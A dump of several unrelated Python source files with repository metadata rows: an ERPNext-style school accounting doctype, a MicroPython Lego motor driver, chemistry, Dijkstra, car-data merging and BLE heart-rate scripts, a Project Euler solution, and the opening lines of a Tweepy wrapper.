            if not frappe.db.exists("Location", "{0} - {1}".format(loc_detail["location_name"], self.abbr)):
                location = frappe.get_doc({
                    "doctype": "Location",
                    "location_name": loc_detail["location_name"],
                    "is_group": loc_detail["is_group"],
                    "organization": self.organization,
                    "school": self.name,
                    "parent_location": "{0} - {1}".format(_("All Locations"), self.abbr) if not loc_detail["is_group"] else "",
                    "location_type" : loc_detail["location_type"] if "location_type" in loc_detail else None
                })
                location.flags.ignore_permissions = True
                location.flags.ignore_mandatory = True
                location.insert()
    def create_default_cost_center(self):
        """Create the school's root cost center and a 'Main' leaf, then record defaults."""
        cc_list = [
            {
                'cost_center_name': self.name,
                'school':self.name,
                'is_group': 1,
                'parent_cost_center':None
            },
            {
                'cost_center_name':_('Main'),
                'school':self.name,
                'is_group':0,
                'parent_cost_center':self.name + ' - ' + self.abbr
            },
        ]
        for cc in cc_list:
            cc.update({"doctype": "Cost Center"})
            cc_doc = frappe.get_doc(cc)
            cc_doc.flags.ignore_permissions = True
            # The root node has no parent, so skip mandatory-field checks.
            if cc.get("cost_center_name") == self.name:
                cc_doc.flags.ignore_mandatory = True
            cc_doc.insert()
        frappe.db.set(self, "default_cost_center", _("Main") + " - " + self.abbr)
        frappe.db.set(self, "round_off_cost_center", _("Main") + " - " + self.abbr)
        frappe.db.set(self, "depreciation_cost_center", _("Main") + " - " + self.abbr)
    def set_default_accounts(self):
        """Look up and store the school's default ledger accounts by account type/name."""
        default_accounts = {
            "default_cash_account": "Cash",
            "default_bank_account": "Bank",
            "round_off_account": "Round Off",
            "accumulated_depreciation_account": "Accumulated Depreciation",
            "depreciation_expense_account": "Depreciation",
            "capital_work_in_progress_account": "Capital Work in Progress",
            "asset_received_but_not_billed": "Asset Received But Not Billed",
            "expenses_included_in_asset_valuation": "Expenses Included In Asset Valuation"
        }
        if self.enable_perpetual_inventory:
            # Stock-related defaults only matter with perpetual inventory on.
            default_accounts.update({
                "stock_received_but_not_billed": "Stock Received But Not Billed",
                "default_inventory_account": "Stock",
                "stock_adjustment_account": "Stock Adjustment",
                "expenses_included_in_valuation": "Expenses Included In Valuation",
                "default_expense_account": "Cost of Goods Sold"
            })
        if self.update_default_account:
            for default_account in default_accounts:
                self._set_default_account(default_account, default_accounts.get(default_account))
        if not self.default_income_account:
            income_account = frappe.db.get_value("Account", {"account_name": _("Sales"), "school": self.name, "is_group": 0})
            if not income_account:
                income_account = frappe.db.get_value("Account", {"account_name": _("Sales Account"), "school": self.name})
            self.db_set("default_income_account", income_account)
        if not self.default_payable_account:
            # NOTE(review): this assigns the field to its own (falsy) value,
            # which is a no-op; presumably an Account lookup like the other
            # branches was intended — confirm and fix.
            self.db_set("default_payable_account", self.default_payable_account)
        if not self.write_off_account:
            write_off_acct = frappe.db.get_value("Account", {"account_name": _("Write Off"), "school": self.name, "is_group": 0})
            self.db_set("write_off_account", write_off_acct)
        if not self.exchange_gain_loss_account:
            exchange_gain_loss_acct = frappe.db.get_value("Account", {"account_name": _("Exchange Gain/Loss"), "school": self.name, "is_group": 0})
            self.db_set("exchange_gain_loss_account", exchange_gain_loss_acct)
        if not self.disposal_account:
            disposal_acct = frappe.db.get_value("Account", {"account_name": _("Gain/Loss on Asset Disposal"), "school": self.name, "is_group": 0})
            self.db_set("disposal_account", disposal_acct)
    def set_mode_of_payment_account(self):
        # Attach this school's default cash account to the 'Cash' mode of
        # payment, once, if not already configured.
        cash = frappe.db.get_value('Mode of Payment', {'type': 'Cash'}, 'name')
        if cash and self.default_cash_account and not frappe.db.get_value('Mode of Payment Account', {'school': self.name, 'parent': cash}):
            mode_of_payment = frappe.get_doc('Mode of Payment', cash)
            mode_of_payment.append('accounts', {'school': self.name, 'default_account': self.default_cash_account})
            mode_of_payment.save(ignore_permissions=True)
    def _set_default_account(self, fieldname, account_type):
        # Helper: set `fieldname` to the school's account of `account_type`,
        # but never overwrite an already-populated field.
        if self.get(fieldname):
            return
        account = frappe.db.get_value("Account", {"account_type": account_type, "is_group": 0, "school": self.name})
        if account:
            self.db_set(fieldname, account)
@frappe.whitelist()
def enqueue_replace_abbr(school, old, new):
    # Run the abbreviation replacement in a background job so long renames do
    # not block the web request.
    kwargs = dict(school=school, old=old, new=new)
    frappe.enqueue('ifitwala_ed.school_settings.doctype.school.school.replace_abbr', **kwargs)
@frappe.whitelist()
def replace_abbr(school, old, new):
    """Replace a school's abbreviation (System Manager only).

    :param school: name of the School document to update.
    :param old: previous abbreviation (used as the suffix to strip on renames).
    :param new: replacement abbreviation; must be non-blank.
    """
    new = new.strip()
    if not new:
        frappe.throw(_("Abbr can not be blank or space"))
    frappe.only_for("System Manager")
    frappe.db.set_value("School", school, "abbr", new)
    # NOTE(review): the two helpers below are defined but never called, and
    # _rename_records references an undefined `dt`; presumably a loop over the
    # doctypes to rename (e.g. for dt in [...]: _rename_records(dt)) was
    # intended here — confirm before relying on suffix renames happening.
    def _rename_record(doc):
        parts = doc[0].rsplit(" - ", 1)
        if len(parts) == 1 or parts[1].lower() == old.lower():
            frappe.rename_doc(dt, doc[0], parts[0] + " - " + new)
    def _rename_records(dt):
        # rename is expensive so let's be economical with memory usage
        doc = (d for d in frappe.db.sql("select name from `tab%s` where school=%s" % (dt, '%s'), school))
        for d in doc:
            _rename_record(d)
def get_name_with_abbr(name, school):
    # Ensure `name` carries the school's abbreviation as its final " - "
    # separated segment (appending it only when not already present).
    school_abbr = frappe.db.get_value("School", school, "abbr")
    parts = name.split(" - ")
    if parts[-1].lower() != school_abbr.lower():
        parts.append(school_abbr)
    return " - ".join(parts)
@frappe.whitelist()
def get_children(doctype, parent=None, school=None, is_root=False):
    # Tree-view endpoint: list child schools of `parent` as
    # {value, expandable} rows.  The virtual "All Schools" root maps to an
    # empty parent.  NOTE(review): `school` and `is_root` are accepted for the
    # tree-view API signature but unused here.
    if parent is None or parent == "All Schools":
        parent = ""
    return frappe.db.sql("""
        SELECT
            name as value,
            is_group as expandable
        FROM
            `tab{doctype}` comp
        WHERE
            ifnull(parent_school, "")={parent}
        """.format(
            doctype=doctype,
            parent=frappe.db.escape(parent)
        ), as_dict=1)
@frappe.whitelist()
def add_node():
    # Tree-view endpoint: create a new School from the submitted form dict,
    # treating the virtual "All Schools" root as "no parent".
    from frappe.desk.treeview import make_tree_args
    args = frappe.form_dict
    args = make_tree_args(**args)
    if args.parent_school == 'All Schools':
        args.parent_school = None
    frappe.get_doc(args).insert()
| fderyckel/ifitwala_ed | ifitwala_ed/school_settings/doctype/school/school.py | school.py | py | 8,359 | python | en | code | 18 | github-code | 13 |
14906880013 | from micropython import const
import uos as os
import utime as time
import machine
import ustruct
import i2c_bus, module
M5GO_WHEEL_ADDR = const(0x56)
MOTOR_CTRL_ADDR = const(0x00)
ENCODER_ADDR = const(0x04)
motor1_pwm = 0
motor2_pwm = 0
def dead_area(amt, low, low_up, high, high_up):
    """
    Shape a motor command around a dead band: values strictly inside
    (low_up, high_up) collapse to 0, values strictly between high_up and high
    snap up to high, values strictly between low and low_up snap down to low,
    and anything else passes through unchanged.
    """
    if low_up < amt < high_up:
        shaped = 0
    elif high_up < amt < high:
        shaped = high
    elif low < amt < low_up:
        shaped = low
    else:
        shaped = amt
    return shaped
def constrain(amt, low, high):
    """Clamp *amt* into [low, high], checking the lower bound first."""
    if amt < low:
        return low
    return high if amt > high else amt
class Lego_Motor:
    """One channel of the M5GO/Bala wheel controller, addressed over I2C.
    PWM commands are written to MOTOR_CTRL_ADDR and incremental encoder deltas
    are read back from ENCODER_ADDR (two int16 values, one per motor)."""
    def __init__(self, port):
        # port selects the motor channel: 1 -> first int16 slot, else second.
        self.i2c = i2c_bus.get(i2c_bus.M_BUS)
        # NOTE(review): _available is called twice in a row; the duplicate
        # call looks unintentional (possibly a retry) — confirm.
        self._available()
        self._available()
        self.port = port
        self._position = 0
        self.updateTime = 0
    def _available(self):
        # NOTE(review): both operands of `or` probe the same address; a second
        # device address was presumably intended here.
        if self.i2c.is_ready(M5GO_WHEEL_ADDR) or self.i2c.is_ready(M5GO_WHEEL_ADDR):
            pass
        else:
            raise module.Module("Bala maybe not connect")
    def stop(self):
        # Cut power to this channel.
        self.set_pwm(0)
    def set_pwm(self, pwm):
        # Update this channel's cached PWM and push BOTH channels to the
        # controller in one little-endian <int16, int16> write.
        global motor1_pwm, motor2_pwm
        if self.port == 1:
            motor1_pwm = pwm
        else:
            motor2_pwm = pwm
        buf = ustruct.pack('<hh', int(motor1_pwm), int(motor2_pwm))
        self.i2c.writeto_mem(M5GO_WHEEL_ADDR, MOTOR_CTRL_ADDR, buf)
    def read_encoder(self):
        # Accumulated encoder position (refreshed at most every 20 ms).
        self.position_update()
        return self._position
    def _read_encoder(self):
        # Raw incremental delta for this channel since the last read.
        buf = bytearray(4)
        self.i2c.readfrom_mem_into(M5GO_WHEEL_ADDR, ENCODER_ADDR, buf)
        encoder_buf = tuple(ustruct.unpack('<hh', buf))
        if self.port == 1:
            return encoder_buf[0]
        else:
            return encoder_buf[1]
    def position_update(self):
        # Accumulate encoder deltas, throttled to one bus read per 20 ms.
        if time.ticks_ms() - self.updateTime > 20:
            self.updateTime = time.ticks_ms()
            self._position = self._position + self._read_encoder()
    def run_to(self, pos, speed):
        # PD position loop toward absolute encoder position `pos`, capped at
        # +/-speed.  Terminates after ~10 consecutive in-band (+/-15) samples
        # or when four consecutive commands were exactly zero.
        error_last_1 = 0
        pwm_last = [255, 255, 255, 255]
        self.position_update()
        _distance = pos
        pwm_now = 0
        kp = 0.85
        kd = 7.0
        tick_now = time.ticks_ms()
        num = 0
        while True:
            time.sleep_ms(1)
            # Run the control step on a ~10 ms cadence.
            if time.ticks_ms() - tick_now > 10:
                tick_now = time.ticks_ms()
                error = _distance - self.read_encoder()
                pwm_now = kp*error + kd*(error-error_last_1)
                pwm_now = constrain(pwm_now, -speed, speed)
                # Dead-band shaping: tiny commands become 0, mid commands snap
                # to full scale (see dead_area).
                pwm_now = dead_area(pwm_now, -100, -3, 100, 3)
                pwm_now = -pwm_now
                error_last_1 = error
                pwm_last = pwm_last[1:4]
                if -15 < error < 15:
                    num += 1
                else:
                    num = 0
                if num > 10:
                    self.set_pwm(0)
                    break
                self.set_pwm(pwm_now)
                pwm_last.append(pwm_now)
                if pwm_last == [0, 0, 0, 0]:
                    break
    def run_distance(self, distance=500, speed=255):
        # Same PD loop as run_to, but relative: target is the current
        # accumulated position plus `distance` encoder counts.
        error_last_1 = 0
        pwm_last = [255, 255, 255, 255]
        _distance = self.read_encoder() + distance
        pwm_now = 0
        kp = 0.85
        kd = 7.0
        tick_now = time.ticks_ms()
        num = 0
        while True:
            time.sleep_ms(1)
            if time.ticks_ms() - tick_now > 10:
                tick_now = time.ticks_ms()
                self.position_update()
                error = _distance - self.read_encoder()
                pwm_now = kp*error + kd*(error-error_last_1)
                pwm_now = constrain(pwm_now, -speed, speed)
                pwm_now = dead_area(pwm_now, -100, -3, 100, 3)
                pwm_now = -pwm_now
                error_last_1 = error
                pwm_last = pwm_last[1:4]
                if -15 < error < 15:
                    num += 1
                else:
                    num = 0
                if num > 10:
                    self.set_pwm(0)
                    break
                self.set_pwm(pwm_now)
                pwm_last.append(pwm_now)
                if pwm_last == [0, 0, 0, 0]:
                    break
    def deinit(self):
        # No hardware resources to release; kept for module API symmetry.
        pass
class Lego:
    """Convenience wrapper exposing the two wheel channels as M1 and M2."""

    def __init__(self):
        self.M1 = Lego_Motor(1)
        self.M2 = Lego_Motor(2)

    def deinit(self):
        """Release both motor channels."""
        self.M1.deinit()
        self.M2.deinit()
40597601185 | import yaml
from os import path
# Load the BH76 reference-energy YAML that sits next to this script, then
# invert it: ts_d maps each transition-state system (positive stoichiometric
# coefficient) to the list of barrier-height indices it appears in.
rdir = path.dirname(path.realpath(__file__)) + '/'
refs = yaml.load(open(rdir + 'BH76_ref_energies.yaml','r'), Loader=yaml.Loader)
ts_d = {}
# NOTE(review): the enumerate index `ibh` is never used; a plain iteration
# over `refs` would suffice.
for ibh, abh in enumerate(refs):
    for asys in refs[abh]['Stoich']:
        if refs[abh]['Stoich'][asys] > 0:
            if asys not in ts_d:
                ts_d[asys] = [abh]
            else:
                ts_d[asys].append(abh)
def s2_to_s(ssq):
    """Invert <S^2> = S(S+1): return the positive root S of S^2 + S - ssq = 0."""
    discriminant_root = (1. + 4. * ssq) ** 0.5
    return (discriminant_root - 1.) / 2.
# Build spin_contam.csv: for each transition state, parse the HF input for the
# requested spin (2S) and restricted flag, then (for unrestricted runs) pull
# the computed <S^2> from the output and report S and its percent error.
wpath = './results_aug-cc-pvqz/HF/HF_BH76/'
ostr = 'Transition state, Computed <S^2>, Computed S, Input S , PE (%), BH index 1, BH index 2,...\n'
for asys in ts_d:
    got_two_s = False
    got_res = False
    # Scan the input file for the "2S = ..." and "restricted = ..." settings.
    with open(wpath + asys + '/inp.txt','r') as tfl:
        for arow in tfl:
            if '2S' in arow:
                ideal_s = float(arow.split('=')[-1].strip())/2.
                got_two_s = True
            elif 'restricted' in arow:
                tmp = arow.split('=')[-1].strip().lower()
                if tmp[0] == 't' or tmp == 'true':
                    LR = True
                elif tmp[0] == 'f' or tmp == 'false':
                    LR = False
                got_res = True
            if got_two_s and got_res:
                break
    # NOTE(review): if a file lacks the 'restricted' line, LR carries over
    # from the previous iteration (or is undefined on the first) — confirm
    # every inp.txt contains it.
    if LR:
        # Restricted runs are spin-pure by construction.
        ostr += '{:}, 0, 0, 0, 0'.format(asys)
    else:
        # Unrestricted: read the computed <S^2> from the output file.
        with open(wpath + asys + '/' + asys + '.txt','r') as tfl:
            for arow in tfl:
                if '<S^2>' in arow:
                    ssq = float(arow.split('<S^2> =')[-1].split('2S+1')[0])
                    comps = s2_to_s(ssq)
                    ostr += '{:}, {:.4f}, {:.4f}, {:}, {:.4f}'\
                        .format(asys,ssq,comps,ideal_s, 100*(comps/ideal_s - 1.))
                    break
    # Append the barrier-height indices this system participates in.
    for anindx in ts_d[asys]:
        ostr += ', {:}'.format(anindx)
    ostr += '\n'
with open('./spin_contam.csv','w+') as tfl:
    tfl.write(ostr)
| esoteric-ephemera/BH76-PySCF-PyFLOSIC | get_s_squared.py | get_s_squared.py | py | 1,885 | python | en | code | 0 | github-code | 13 |
14739419445 | #Uses python3
import sys
from multiprocessing import Queue
import queue
import math
import heapq
class PriorityQueue(queue.Queue):
    """
    Thread-safe priority queue: items are put as (data, priority) pairs and
    get() always returns the pair with the smallest priority, as
    (priority, data).

    BUG FIXES vs. the original:
    - Base class was ``multiprocessing.Queue``, which is a factory *function*
      (a bound context method), so the class statement itself raised
      TypeError; ``queue.Queue`` (already imported) is the subclassable one.
    - ``queue.Queue`` backs itself with a deque, whose ``pop()`` takes no
      index; ``_init`` is overridden to use a plain list so ``pop(0)`` works.
    - ``mid = (lo + hi) / 2`` produced a float index under Python 3; binary
      search now uses integer division.
    """

    def _init(self, maxsize):
        # Use a list (not the default deque) so _get can pop from the front.
        self.queue = []

    def _put(self, item):
        data, priority = item
        self._insort_right((priority, data))

    def _get(self):
        # Front of the sorted list is the smallest priority.
        return self.queue.pop(0)

    def _insort_right(self, x):
        """Insert item x in list, and keep it sorted assuming a is sorted.

        If x is already in list, insert it to the right of the rightmost x.
        """
        a = self.queue
        lo = 0
        hi = len(a)
        while lo < hi:
            mid = (lo + hi) // 2
            if x[0] < a[mid][0]:
                hi = mid
            else:
                lo = mid + 1
        a.insert(lo, x)
def distance(adj, cost, s, t):
    """
    Dijkstra shortest-path distance from s to t in a directed graph.

    adj[u] lists the neighbours of u and cost[u] the matching non-negative
    edge weights (edge u -> adj[u][i] weighs cost[u][i]).

    :return: length of the shortest s->t path, or -1 when t is unreachable.

    BUG FIXES vs. the original: the nested ``for w in cost[u]: for v in
    adj[u]:`` loops paired every weight with every neighbour instead of
    zipping them; ``(distTo[u], u) = pq.get()`` clobbered settled distances
    with stale queue entries; and debug prints of the distance/parent arrays
    polluted the expected output.  Rewritten as a standard lazy-deletion
    heapq Dijkstra.
    """
    dist = [math.inf] * len(adj)
    dist[s] = 0
    pq = [(0, s)]  # (distance-so-far, node) min-heap
    while pq:
        d, u = heapq.heappop(pq)
        if d > dist[u]:
            continue  # stale entry; a shorter path to u was already settled
        for v, w in zip(adj[u], cost[u]):
            if dist[u] + w < dist[v]:
                dist[v] = dist[u] + w
                heapq.heappush(pq, (dist[v], v))
    return -1 if dist[t] == math.inf else dist[t]
if __name__ == '__main__':
    # Input format: n m, then m edges as "a b w" (1-based endpoints), then
    # the query "s t".  NOTE(review): reads a local debug file instead of
    # stdin, never closes it, shadows the builtin `input`, and prints the
    # adjacency/cost lists — all debug leftovers to clean up before grading.
    file1 = open("01dijk.txt", "r")
    input = file1.read()
    #input = sys.stdin.read()
    data = list(map(int, input.split()))
    n, m = data[0:2]
    data = data[2:]
    # Group the flat token stream into ((a, b), w) edge triples.
    edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
    data = data[3 * m:]
    adj = [[] for _ in range(n)]
    cost = [[] for _ in range(n)]
    for ((a, b), w) in edges:
        adj[a - 1].append(b - 1)
        cost[a - 1].append(w)
    s, t = data[0] - 1, data[1] - 1
    print(adj)
    print(cost)
    print(distance(adj, cost, s, t))
| price-dj/Algorithms_On_Graphs | Week4/pset4/dijkstrav6.py | dijkstrav6.py | py | 1,963 | python | en | code | 0 | github-code | 13 |
19253451866 | import sqlite3
import json
from sqlacodegen.codegen import CodeGenerator
from sqlalchemy import create_engine, MetaData
import sqlalchemy_utils
import pandas as pd
import pickle
import numpy as np
import re
import unittest
def trim_trim(trim):
    """
    Normalise a trim-level string: keep only ASCII-alphabetic words,
    upper-case them and join with single spaces.  Returns numpy NaN when no
    such word exists (e.g. purely numeric or Hebrew text).
    """
    words = [word.upper() for word in re.findall(r'\b[A-Za-z]+\b', trim)]
    if not words:
        return np.nan
    return ' '.join(words)
class MyFunctionTestCase(unittest.TestCase):
    def test_scenario1(self):
        """trim_trim keeps only Latin-letter words, upper-cased, space-joined."""
        input = 'Sportback RFS 13 מווו'
        # BUG FIX: trim_trim returns a single space-joined string, not a list
        # of words; the old expected value ['SPORTBACK', 'RFS'] could never
        # match, so this test always failed.
        expected_output = 'SPORTBACK RFS'
        result = trim_trim(input)
        self.assertEqual(result, expected_output)
    '''def test_scenario2(self):
        input = ... # Define the input for this scenario
        expected_output = ... # Define the expected output
        result = my_function(input)
        self.assertEqual(result, expected_output)'''
    # Add more test scenarios as needed
'''if __name__ == '__main__':
unittest.main()'''
# NOTE(review): exact duplicate of trim_trim defined earlier in this file;
# this redefinition shadows the first and can safely be deleted.
def trim_trim(trim):
    # Keep only ASCII-alphabetic words, upper-cased.
    trimming = re.findall(r'\b[A-Za-z]+\b', trim)
    trimming = [x.upper() for x in trimming]
    if trimming:
        return ' '.join(trimming)
    # No Latin-letter word present: signal "missing" with NaN.
    return np.nan
# --- Load pickled inputs -------------------------------------------------
# NOTE(review): hebrew_fields is loaded twice (the second load is redundant)
# and neither hebrew_fields nor df_datagov is used below in this section.
with open('hebrew_fields.pkl', 'rb') as pickle_file:
    hebrew_fields = pickle.load(pickle_file)
with open('audi_datagov.pkl', 'rb') as car_file:
    df_datagov = pickle.load(car_file)
with open('hebrew_fields.pkl', 'rb') as pickle_file:
    hebrew_fields = pickle.load(pickle_file)
# --- Read the data.gov table into df1 ------------------------------------
file_name = 'audi_datagov.db'
conn = sqlite3.connect(file_name)
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table';")
table_names = c.fetchall()
c.execute("SELECT * FROM data_gov")
data = c.fetchall()
data_columns = [desc[0] for desc in c.description]
df1 = pd.DataFrame(data, columns=data_columns)
# --- Read the icar cars table (pickled blobs per field) ------------------
file_name = 'audi_icar3.sql'
conn = sqlite3.connect(file_name)
c = conn.cursor()
c.execute("SELECT * FROM cars")
#cursor.execute("SELECT name FROM sqlite_master WHERE type='table'")
#tables = cursor.fetchall()
rows = c.fetchall()
'''a = rows[0][3]
if isinstance(a, bytes):
    a2 = 'yes'
else:
    a2 = 'no'''
# SECURITY NOTE: pickle.loads on database blobs executes arbitrary code if
# the .sql file is not fully trusted.
icar_sql = [[pickle.loads(field) if isinstance(field, bytes) else field for field in car] for car in rows]
icar_dict = [x[2] for x in icar_sql]
icar_general_model = [x[0] for x in icar_sql]
icar_exact_model = [x[1] for x in icar_sql]
icar_names = list(icar_dict[0].keys())
icar_values = [list(car.values()) for car in icar_dict]
# Join keys: data.gov (Hebrew-transliterated) column names on the left,
# icar column names on the right; the *_trim variants add the trim level.
left_on_trim = ['shnat_yitzur', 'koah_sus', 'nefah_manoa', 'mispar_dlatot', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'kinuy_mishari', 'ramat_gimur']
right_on_trim = ['year', 'power', 'capacity', 'doors', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'general_model', 'trim']
left_on = ['shnat_yitzur', 'koah_sus', 'nefah_manoa', 'mispar_dlatot', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'kinuy_mishari']
right_on = ['year', 'power', 'capacity', 'doors', 'hanaa_nm', 'automatic_ind', 'mispar_moshavim', 'delek_cd', 'general_model']
#int_columns = right_on[:4] + right_on[5:]
#a = pd.to_numeric(df2['capacity'])
#a.astype(int)
#df2_types = [np.int64, np.int64, int, np.int64, np.int64, np.int64, np.int64]
#df2[int_columns] = df2[int_columns].applymap(lambda x: pd.to_numeric(x))
#df2 = df2.drop('trim', axis=1)
# NOTE(review): df2 is used below but never defined in this file (its
# construction is commented out above), so the next line raises NameError;
# likewise `df` two lines later, and trim2 is computed but never used.
df2 = df2.drop('additional_safety_equipment', axis=1)
trim = df2['trim'].apply(trim_trim)
trim2 = df['trim']
trim2 = [trim_trim(trim) for trim in trim2]
df2['trim'] = trim
b = 5
#df2_type_dict = dict(zip(df2_int_columns, df2_types))
#df2.astype(df2_type_dict)
#[df2[column].astype(np.int64) for column in df2_int_columns]
# Perform initial merge of df1 and df3 based on left_on and right_on columns
#merge1 =
merged_df = pd.merge(df1, df2, left_on=left_on, right_on=right_on, how='left')
unique_df = merged_df.drop_duplicates(keep='last')
unique_df.dropna(inplace=True)
b=5
'''# Drop rows with NaN values in merge_columns from merged_df
merged_df.dropna(subset=merge_columns, inplace=True)
# Drop duplicate rows from merged_df based on left_index column, keep the first occurrence
merged_df.drop_duplicates(subset='left_index', keep='first', inplace=True)
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Create a new column 'matching_index' in merged_df containing the index of the first matching row, if any
merged_df['matching_index'] = merged_df['left_index']
# Drop rows without a match (NaN values in right_index)
merged_df.dropna(subset=['right_index'], inplace=True)
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Convert the 'matching_index' column to integer type
merged_df['matching_index'] = merged_df['matching_index'].astype(int)
# Concatenate the appropriate row from df2 to each remaining row in merged_df
merged_df = pd.concat([merged_df, df2.loc[merged_df['matching_index']]])
# Reset index in merged_df
merged_df.reset_index(drop=True, inplace=True)
# Perform initial merge of df1 and df3 based on left_on and right_on columns
merged_df1 = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, left_index=True, how='left')
# Drop rows with NaN values in merge_columns from merged_df1
merged_df1.dropna(subset=merge_columns, inplace=True)
# Drop duplicate rows from merged_df1 based on left_index column, keep the first occurrence
merged_df1.drop_duplicates(subset='index_col', keep='first', inplace=True)
# Reset index in merged_df1
merged_df1.reset_index(drop=True, inplace=True)
# Concatenate the appropriate row from df2 to each remaining row in merged_df1
merged_df1 = pd.concat([merged_df1, df2.loc[merged_df1['right_index']]])
# Reset index in merged_df1
merged_df1.reset_index(drop=True, inplace=True)
# Perform merge based on specified columns
merged_df = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left')
# Drop duplicate rows from df2 based on specified columns, keep the first occurrence
merged_df = merged_df.drop_duplicates(subset=merge_columns, keep='first')
# Identify matching rows
matching_rows = merged_df.dropna(subset=merge_columns)
# Extract the matching indices from df2
matching_indices = matching_rows.index.tolist()
# Add a new column to df1 with matching indices from df2
df1['matching_index'] = matching_indices
merged_df3 = pd.merge(df1, df3, left_index=True, right_index=True, left_on=left_on, right_on=merge_columns, how='left')
merged_df3.set_index(merged_df3['column2'], inplace=True)
# Merge df1 with df3 to find the matching index numbers in df2
merged_df3 = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left', suffixes=('', '_spec'))
# Get the matching index numbers from df3
index_numbers = merged_df3.index_spec.values
# Extract the matching rows from df2 using the index numbers
matching_df2 = df2.iloc[index_numbers]
# Concatenate the specs from matching_df2 to df1 based on their index values
merged = pd.concat([df1, matching_df2], axis=1)
# The resulting merged dataframe should now contain the specs from matching_df2
# concatenated to df1 for the cars with matching index numbers in df3.
# Save the resulting merged dataframe to a new CSV file if needed
merged.to_csv('merged_cars.csv', index=False) # Replace with the desired filename
merged_keys = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left')
index_numbers = merged_keys.index.tolist()
# Reset the index of df2
df2 = df2.reset_index(drop=True)
# Select rows from df2 using the extracted index numbers
selected_rows = df2.iloc[index_numbers]
# Concatenate df1 with selected rows from df2
merged = pd.concat([df1, selected_rows], axis=0, ignore_index=True)
merged.to_csv('merged.csv', index=False)
merged = pd.concat([df1, df2.iloc[index_numbers]], axis=0, ignore_index=True)
merged.to_csv('merged.csv', index=False)
# Drop the duplicate columns '_y' from the merge
merged = merged.filter(regex='^(?!.*_y)')
# Reset the index
merged.reset_index(drop=True, inplace=True)
merged.to_csv('merged.csv', index=False)
moo = [str(x).find('u') for x in data if str(x).find('u') > -1 and str(x).find('u') < 100]
engine = data[99]['סוג מנוע']
moo = data[1]
data_read = [json.loads(x) for x in data]
makes = rows2[0]
b=5''' | Chilledfish/icar-Project | icar_database.py | icar_database.py | py | 8,242 | python | en | code | 0 | github-code | 13 |
10524006333 |
MOTION_SERVICE_UUID = "00030000-78fc-48fe-8e23-433b3a1942d0"
STEP_COUNT_UUID = "00030001-78fc-48fe-8e23-433b3a1942d0"
RAW_XYZ_UUID = "00030002-78fc-48fe-8e23-433b3a1942d0"
HEART_RATE_UUID = "00002a37-0000-1000-8000-00805f9b34fb"
MODEL_NBR_UUID = "00002a24-0000-1000-8000-00805f9b34fb"
"""
import asyncio
from bleak import BleakScanner
async def main():
devices = await BleakScanner.discover()
for d in devices:
print(d)
asyncio.run(main())
"""
import asyncio
from bleak import BleakClient
import numpy as np
address = [["CB:F9:47:BD:83:F3"],["DB:0C:6E:BF:5E"],["F7:E6:68:B7:A4:71"]]
async def main(address):
    """
    Connect to each BLE address in *address*, read and print its raw motion
    samples, heart rate and step count.  Returns None (pure I/O).

    :param address: iterable of BLE MAC address strings (e.g. one of the
                    single-address lists from the module-level ``address``).
    """
    # BUG FIX: BleakDeviceNotFoundError was referenced in the except clause
    # below without ever being imported, so a missing device raised NameError
    # instead of printing the "device not found" message.  bleak is already a
    # dependency of this script.
    from bleak.exc import BleakDeviceNotFoundError
    for item in address:
        print(item)
        try:
            async with BleakClient(item) as client:
                heart_buffer = await client.read_gatt_char(HEART_RATE_UUID)
                step_buffer = await client.read_gatt_char(STEP_COUNT_UUID)
                raw_buffer = await client.read_gatt_char(RAW_XYZ_UUID)
                # Payloads are little-endian packed integers.
                raw_data = np.frombuffer(raw_buffer, dtype=np.int16)
                step_data = np.frombuffer(step_buffer, dtype=np.int16)
                heart_data = np.frombuffer(heart_buffer, dtype=np.int8)
                print("motion")
                print(raw_data)
                print("heart rate")
                # Byte 0 of the standard Heart Rate Measurement value is a
                # flags field; byte 1 carries the bpm reading.
                print(heart_data[1])
                print("step count")
                print(step_data[0])
        except BleakDeviceNotFoundError:
            print(item + " device not found")
# Poll the first configured watch.  NOTE(review): main() returns None, so
# heart_data is always None here; return heart_data[1] from main() if the
# value is actually needed downstream.
heart_data = asyncio.run(main(address[0]))
#osc.send(/cue/heart_data)
#except:
#    print("timeout")
37562353138 | # The prime factors of 13195 are 5, 7, 13 and 29.
# What is the largest prime factor of the number 600851475143 ?
def prime_check(x):
for i in range(2,int(x ** 0.5) + 1):
if x%i ==0:
return False
return True
biggest_prime = 1
for i in range(2,int(600851475143 ** 0.5)):
if (600851475143 % i == 0 and prime_check(i)):
biggest_prime = i
print(biggest_prime)
| mertsengil/Project_Euler_with_Python | Problem_3.py | Problem_3.py | py | 414 | python | en | code | 0 | github-code | 13 |
18414787771 | from project.software.software import Software
class Hardware:
def __init__(self, name, type, capacity, memory):
self.name = name
self.type = type # NOTE Test both types of hardware ("Heavy" or "Power")
self.capacity = capacity # NOTE Test both capacity types of hardware ("Heavy" or "Power")
self.memory = memory
self.software_components = []
self.memory_used = 0
self.capacity_used = 0
def install(self, software: Software):
if self.memory_used + software.memory_consumption > self.memory \
or self.capacity_used + software.capacity_consumption > self.capacity:
raise Exception("Software cannot be installed")
# NOTE create both type of software -->> (Express and Light) / Create both types of hardware as well
self.software_components.append(software) # Test successful and unsuccessful installation
self.memory_used += software.memory_consumption
self.capacity_used += software.capacity_consumption
def uninstall(self, software: Software):
self.software_components.remove(software)
self.memory_used -= software.memory_consumption
self.capacity_used -= software.capacity_consumption
| MiroVatov/Python-SoftUni | PYTHON OOP/Previous Exams/Exam Prep 16 August 2020 Version 2/project/hardware/hardware.py | hardware.py | py | 1,262 | python | en | code | 0 | github-code | 13 |
38605594320 | # -*- coding: utf-8 -*-
import tweepy
import requests
from access import *
import argparse
class Api(object):
    """Thin wrapper around the Tweepy API used to clone another profile.

    Authenticates with the OAuth credentials imported from ``access`` and
    exposes helpers to read, post, delete tweets, follow users, and copy a
    profile's images and metadata.
    """

    def __init__(self):
        super(Api, self).__init__()
        try:
